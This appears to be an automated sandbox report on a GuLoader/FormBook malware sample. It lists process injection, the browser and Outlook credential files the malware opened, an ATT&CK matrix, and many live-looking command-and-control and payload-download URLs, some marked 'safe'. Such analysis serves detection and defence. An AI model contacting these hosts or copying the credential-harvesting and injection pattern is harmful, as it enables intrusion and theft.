          Source: C:\Users\user\Desktop\02Eh1ah35H.exeNtQueueApcThread: Indirect: 0x12F5BBJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x335A4B7Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQueryInformationToken: Direct from: 0x3359DE7Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FF9BA9C2651Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x3358247Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x336152EJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtAllocateVirtualMemory: Direct from: 0x33653C9Jump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeNtSetContextThread: Indirect: 0x1337F9Jump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeNtSuspendThread: Indirect: 0x133B19Jump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeNtResumeThread: Indirect: 0x133E39Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7FF9841A9E7F
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: NULL target: C:\Windows\SysWOW64\waitfor.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeThread register set: target process: 6612Jump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeThread register set: target process: 6612Jump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeThread register set: target process: 532Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeProcess created: C:\Users\user\Desktop\02Eh1ah35H.exe "C:\Users\user\Desktop\02Eh1ah35H.exe"Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: RAVCpl64.exe, 00000003.00000000.28474908296.0000000000D50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: RAVCpl64.exe, 00000003.00000000.28474908296.0000000000D50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: RAVCpl64.exe, 00000003.00000000.28474908296.0000000000D50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: RAVCpl64.exe, 00000003.00000000.28474908296.0000000000D50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager|Z5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A2

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 00000002.00000002.28555602772.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.33482246521.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.33482135316.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\waitfor.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 00000002.00000002.28555602772.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.33482246521.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.33482135316.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API          		1
          Registry Run Keys / Startup Folder          		1
          Access Token Manipulation          		1
          Masquerading          		1
          OS Credential Dumping          		321
          Security Software Discovery          		Remote Services1
          Email Collection          		11
          Encrypted Channel          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading          		312
          Process Injection          		12
          Virtualization/Sandbox Evasion          		LSASS Memory12
          Virtualization/Sandbox Evasion          		Remote Desktop Protocol1
          Archive Collected Data          		4
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Abuse Elevation Control Mechanism          		1
          Access Token Manipulation          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin Shares1
          Data from Local System          		5
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Registry Run Keys / Startup Folder          		312
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object Model1
          Clipboard Data          		6
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		LSA Secrets2
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Abuse Elevation Control Mechanism          		Cached Domain Credentials14
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
          Obfuscated Files or Information          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588655 Sample: 02Eh1ah35H.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 29 www.optimismbank.xyz 2->29 31 www.zkdamdjj.shop 2->31 33 23 other IPs or domains 2->33 43 Suricata IDS alerts for network traffic 2->43 45 Antivirus / Scanner detection for submitted sample 2->45 47 Multi AV Scanner detection for submitted file 2->47 51 3 other signatures 2->51 10 02Eh1ah35H.exe 27 2->10         started        signatures3 49 Performs DNS queries to domains with low reputation 29->49 process4 file5 27 C:\Users\user\AppData\Local\...\System.dll, PE32 10->27 dropped 63 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->63 65 Tries to detect Any.run 10->65 67 Switches to a custom stack to bypass stack traces 10->67 14 02Eh1ah35H.exe 6 10->14         started        signatures6 process7 dnsIp8 41 babalharra.com.au 122.201.127.17, 443, 49757 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 14->41 69 Modifies the context of a thread in another process (thread injection) 14->69 71 Tries to detect Any.run 14->71 73 Maps a DLL or memory area into another process 14->73 75 2 other signatures 14->75 18 RAVCpl64.exe 14->18 injected signatures9 process10 dnsIp11 35 thaor56.online 202.92.5.23, 49811, 80 VNPT-AS-VNVNPTCorpVN Viet Nam 18->35 37 www.madhf.tech 103.224.182.242, 49771, 49772, 49773 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 18->37 39 13 other IPs or domains 18->39 53 Found direct / indirect Syscall (likely to bypass EDR) 18->53 22 waitfor.exe 13 18->22         started        signatures12 process13 signatures14 55 Tries to steal Mail credentials (via file / registry access) 22->55 57 Tries to harvest and steal browser information (history, passwords, etc) 22->57 59 Modifies the context of a thread in another process (thread injection) 22->59 61 2 other signatures 22->61 25 firefox.exe 22->25         started        process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          02Eh1ah35H.exe50%ReversingLabsWin32.Trojan.Guloader
          02Eh1ah35H.exe100%AviraTR/Injector.emxhl
          02Eh1ah35H.exe69%VirustotalBrowse
          02Eh1ah35H.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsbF672.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.aballanet.cat/4300/0%Avira URL Cloudsafe
          http://www.madhf.tech/3iym/?iS=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&Bi=zJ_w6yPG0%Avira URL Cloudsafe
          http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
          http://www.jcsa.info/Education_Seminars.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNG00%Avira URL Cloudsafe
          http://www.madhf.tech/3iym/0%Avira URL Cloudsafe
          https://claimstakes.online/E9C:0%Avira URL Cloudsafe
          http://www.bankseedz.info/uf7y/0%Avira URL Cloudsafe
          https://claimstakes.online/?==)0%Avira URL Cloudsafe
          http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
          http://www.greenthub.life/r3zg/0%Avira URL Cloudsafe
          http://www.jcsa.info/Course_Descriptions.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImlQhpf80%Avira URL Cloudsafe
          https://babalharra.com.au/BJuAryIbeCLh111.bin0%Avira URL Cloudsafe
          http://www.optimismbank.xyz/98j3/0%Avira URL Cloudsafe
          http://www.jcsa.info/Education_Grant.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNG0JHs0%Avira URL Cloudsafe
          http://www.laohub10.net/n2c9/?iS=3x/7f4nzUvf4SsmqzFnTfg9SxMMmEiloZs8QEOaGeCkTK2Ae1JBrg2z7Qirl6WfPBEFIuXRetS7qNq3tJgV/JudJBWlXSOQ4g5lNoHOvpN8KebvqySaeOvo=&Bi=zJ_w6yPG0%Avira URL Cloudsafe
          http://www.jcsa.info/__media__/js/trademark.php?d=jcsa.info&type=dflt0%Avira URL Cloudsafe
          http://aballanet.cat/4300/?iS=d94ZcmMq/ThngNvhRkyBH4O0kUOwnOVlpzbjHd60%Avira URL Cloudsafe
          http://www.bankseedz.info/uf7y/?iS=X8Xx4Xb3zOwIp/YkPeQkR0guwoAt7ELtmVzPPBr+rNKRcobOh5vjSVYUxnTRN3k+HcX7svN7WZWipHk078Y7lpE6s8+6fnJkBTwA9zJT+z2YULyhD3K67+Y=&Bi=zJ_w6yPG0%Avira URL Cloudsafe
          http://www.aballanet.cat/4300/?iS=d94ZcmMq/ThngNvhRkyBH4O0kUOwnOVlpzbjHd6+2TtVHAifM7eyMUHxFon7bcIQfzPiuuHPlbPirzhbYxLc+qoRY5lZ+tP99KhqilPg4uPHk5PRth/KSxs=&Bi=zJ_w6yPG0%Avira URL Cloudsafe
          http://www.rgenerousrs.store/8gp4/0%Avira URL Cloudsafe
          http://www.jcsa.info/Japanese_Language_School.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yIml0%Avira URL Cloudsafe
          http://www.register.com?trkID=WSTm3u15CW0%Avira URL Cloudsafe
          http://www.greenthub.life/r3zg/?Bi=zJ_w6yPG&iS=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc=0%Avira URL Cloudsafe
          http://www.jcsa.info/Business_Degrees.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImlQhpf8k8y0%Avira URL Cloudsafe
          https://claimstakes.online/=0%Avira URL Cloudsafe
          https://dts.gnpge.com0%Avira URL Cloudsafe
          http://www.1secondlending.one/j8pv/0%Avira URL Cloudsafe
          http://www.jcsa.info/hxi5/0%Avira URL Cloudsafe
          https://babalharra.com.au/BJuAryIbeCLh111.binRB0%Avira URL Cloudsafe
          https://claimstakes.online/50%Avira URL Cloudsafe
          http://www.jcsa.info/Career_Counseling.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNG0J0%Avira URL Cloudsafe
          http://www.jcsa.info/hxi5/?iS=/xN+QifpSgLb8oJax+YyM6tUBGB4yp//ixYmgFld7FWiq7hEgfqLv69cCSKy7O4D9GLUZYEuvgkAAG4+HQzEHPV07OBsdCtve3vh4iUoSVc6KmBMx1Jirj8=&Bi=zJ_w6yPG0%Avira URL Cloudsafe
          http://www.jcsa.info/College_Information.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNG0%Avira URL Cloudsafe
          https://claimstakes.online/;0%Avira URL Cloudsafe
          http://www.jcsa.info/Language_Learning.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNG0J0%Avira URL Cloudsafe
          https://babalharra.com.au/0%Avira URL Cloudsafe
          http://www.Jcsa.info0%Avira URL Cloudsafe
          http://www.1secondlending.one/j8pv/?iS=JIuj9wxSnK6mEyWE+aiov6ee/jFUGAOavn5HAjA8ht24L6v+vQ9uqWj6ig59Dwg+VmGSo2u3Iy71OFL1070b+iEHSPgDI61AbnX1cIuegQgrBk3SzXJVVb4=&Bi=zJ_w6yPG0%Avira URL Cloudsafe
          https://claimstakes.online/J0%Avira URL Cloudsafe
          http://www.yc791022.asia/31pt/?iS=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&Bi=zJ_w6yPG0%Avira URL Cloudsafe
          https://claimstakes.online/0%Avira URL Cloudsafe
          http://www.remedies.pro/a42x/0%Avira URL Cloudsafe
          http://www.laohub10.net/n2c9/0%Avira URL Cloudsafe
          http://www.register.com/?trkID=WSTm3u15CW0%Avira URL Cloudsafe
          http://www.jcsa.info/Best_Online_University.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImlQh0%Avira URL Cloudsafe
          http://www.zkdamdjj.shop/swhs/?iS=8xf1FTtyUpYkrTYMR7SiSpjuEkVK44/qllrz0dKQmws7hy/+lCnqv8AjCvT/8dHN8wn+YkpcLfbwvxo0J0bTV1ZiQxCgHPOqTWlPXofsQEz+qrXGThT4v9Q=&Bi=zJ_w6yPG0%Avira URL Cloudsafe
          http://www.jcsa.info/Community_College_Search.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yIml0%Avira URL Cloudsafe
          http://www.43kdd.top/p3j6/?iS=OVR2CF7p+NAClGW2S0P2PNgTjoCVCaKiV2x0cNqPuUjpn/Qhs1nMs1l1ZXuPw6NSEK+YKob7dwv93+8G93LPPXy+SQSX5+Y6iKJbGa1Xxz7I+GHh/5eIgvw=&Bi=zJ_w6yPG0%Avira URL Cloudsafe
          https://claimstakes.online/%0%Avira URL Cloudsafe
          http://www.jcsa.info/display.cfm0%Avira URL Cloudsafe
          https://babalharra.com.au/BJuAryIbeCLh111.binG0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.bankseedz.info
          		46.30.211.38
          		truetrue
            		unknown
            www.remedies.pro
            		13.248.169.48
            		truetrue
              		unknown
              google.com
              		142.250.191.110
              		truefalse
                		high
                www.optimismbank.xyz
                		76.223.54.146
                		truetrue
                  		unknown
                  www.madhf.tech
                  		103.224.182.242
                  		truetrue
                    		unknown
                    r0lqcud7.nbnnn.xyz
                    		27.124.4.246
                    		truetrue
                      		unknown
                      bpgroup.site
                      		74.48.143.82
                      		truetrue
                        		unknown
                        www.xcvbj.asia
                        		149.88.81.190
                        		truefalse
                          		unknown
                          43kdd.top
                          		154.23.178.231
                          		truetrue
                            		unknown
                            thaor56.online
                            		202.92.5.23
                            		truetrue
                              		unknown
                              www.1secondlending.one
                              		43.205.198.29
                              		truetrue
                                		unknown
                                www.zkdamdjj.shop
                                		104.21.40.167
                                		truetrue
                                  		unknown
                                  www.rgenerousrs.store
                                  		172.67.167.146
                                  		truetrue
                                    		unknown
                                    www.jcsa.info
                                    		208.91.197.39
                                    		truetrue
                                      		unknown
                                      www.google.com
                                      		142.250.190.132
                                      		truefalse
                                        		high
                                        www.yc791022.asia
                                        		101.35.209.183
                                        		truetrue
                                          		unknown
                                          www.greenthub.life
                                          		209.74.77.109
                                          		truetrue
                                            		unknown
                                            babalharra.com.au
                                            		122.201.127.17
                                            		truefalse
                                              		unknown
                                              aballanet.cat
                                              		134.0.14.158
                                              		truetrue
                                                		unknown
                                                www.bpgroup.site
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.43kdd.top
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.laohub10.net
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.aballanet.cat
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown
                                                        www.thaor56.online
                                                        		unknown
                                                        		unknownfalse
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.bankseedz.info/uf7y/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.madhf.tech/3iym/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.aballanet.cat/4300/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.greenthub.life/r3zg/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.madhf.tech/3iym/?iS=hj5olkscFnqSpGaYqfjBZra7XyaBOSmns9/m32Sz6t4FBTGsttWpVpOBqSKeTRLk/faBYURW8ZeFt/JnnXLugYa/8Lo3QiO3YShHpm3KJLMhWdtiao9fFGg=&Bi=zJ_w6yPGtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://babalharra.com.au/BJuAryIbeCLh111.binfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.optimismbank.xyz/98j3/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.laohub10.net/n2c9/?iS=3x/7f4nzUvf4SsmqzFnTfg9SxMMmEiloZs8QEOaGeCkTK2Ae1JBrg2z7Qirl6WfPBEFIuXRetS7qNq3tJgV/JudJBWlXSOQ4g5lNoHOvpN8KebvqySaeOvo=&Bi=zJ_w6yPGtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.bankseedz.info/uf7y/?iS=X8Xx4Xb3zOwIp/YkPeQkR0guwoAt7ELtmVzPPBr+rNKRcobOh5vjSVYUxnTRN3k+HcX7svN7WZWipHk078Y7lpE6s8+6fnJkBTwA9zJT+z2YULyhD3K67+Y=&Bi=zJ_w6yPGtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.aballanet.cat/4300/?iS=d94ZcmMq/ThngNvhRkyBH4O0kUOwnOVlpzbjHd6+2TtVHAifM7eyMUHxFon7bcIQfzPiuuHPlbPirzhbYxLc+qoRY5lZ+tP99KhqilPg4uPHk5PRth/KSxs=&Bi=zJ_w6yPGtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.rgenerousrs.store/8gp4/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.greenthub.life/r3zg/?Bi=zJ_w6yPG&iS=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc=true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.1secondlending.one/j8pv/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.jcsa.info/hxi5/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.jcsa.info/hxi5/?iS=/xN+QifpSgLb8oJax+YyM6tUBGB4yp//ixYmgFld7FWiq7hEgfqLv69cCSKy7O4D9GLUZYEuvgkAAG4+HQzEHPV07OBsdCtve3vh4iUoSVc6KmBMx1Jirj8=&Bi=zJ_w6yPGtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.1secondlending.one/j8pv/?iS=JIuj9wxSnK6mEyWE+aiov6ee/jFUGAOavn5HAjA8ht24L6v+vQ9uqWj6ig59Dwg+VmGSo2u3Iy71OFL1070b+iEHSPgDI61AbnX1cIuegQgrBk3SzXJVVb4=&Bi=zJ_w6yPGtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.yc791022.asia/31pt/?iS=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&Bi=zJ_w6yPGtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.remedies.pro/a42x/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.laohub10.net/n2c9/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.zkdamdjj.shop/swhs/?iS=8xf1FTtyUpYkrTYMR7SiSpjuEkVK44/qllrz0dKQmws7hy/+lCnqv8AjCvT/8dHN8wn+YkpcLfbwvxo0J0bTV1ZiQxCgHPOqTWlPXofsQEz+qrXGThT4v9Q=&Bi=zJ_w6yPGtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.43kdd.top/p3j6/?iS=OVR2CF7p+NAClGW2S0P2PNgTjoCVCaKiV2x0cNqPuUjpn/Qhs1nMs1l1ZXuPw6NSEK+YKob7dwv93+8G93LPPXy+SQSX5+Y6iKJbGa1Xxz7I+GHh/5eIgvw=&Bi=zJ_w6yPGtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabwaitfor.exe, 00000004.00000002.33485556560.0000000008322000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmp, FxK39HI69.4.drfalse
                                                            		high
                                                            https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchwaitfor.exe, 00000004.00000002.33485556560.0000000008322000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmp, FxK39HI69.4.drfalse
                                                              		high
                                                              https://duckduckgo.com/ac/?q=FxK39HI69.4.drfalse
                                                                		high
                                                                http://i1.cdn-image.com/__media__/pics/29590/bg1.png)waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://claimstakes.online/E9C:waitfor.exe, 00000004.00000002.33481940541.0000000004E30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://claimstakes.online/?==)waitfor.exe, 00000004.00000002.33480610058.00000000033E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.02Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD02Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000626000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                        		high
                                                                        http://www.gopher.ftp://ftp.02Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfwaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=waitfor.exe, 00000004.00000002.33485556560.0000000008322000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmp, FxK39HI69.4.drfalse
                                                                                		high
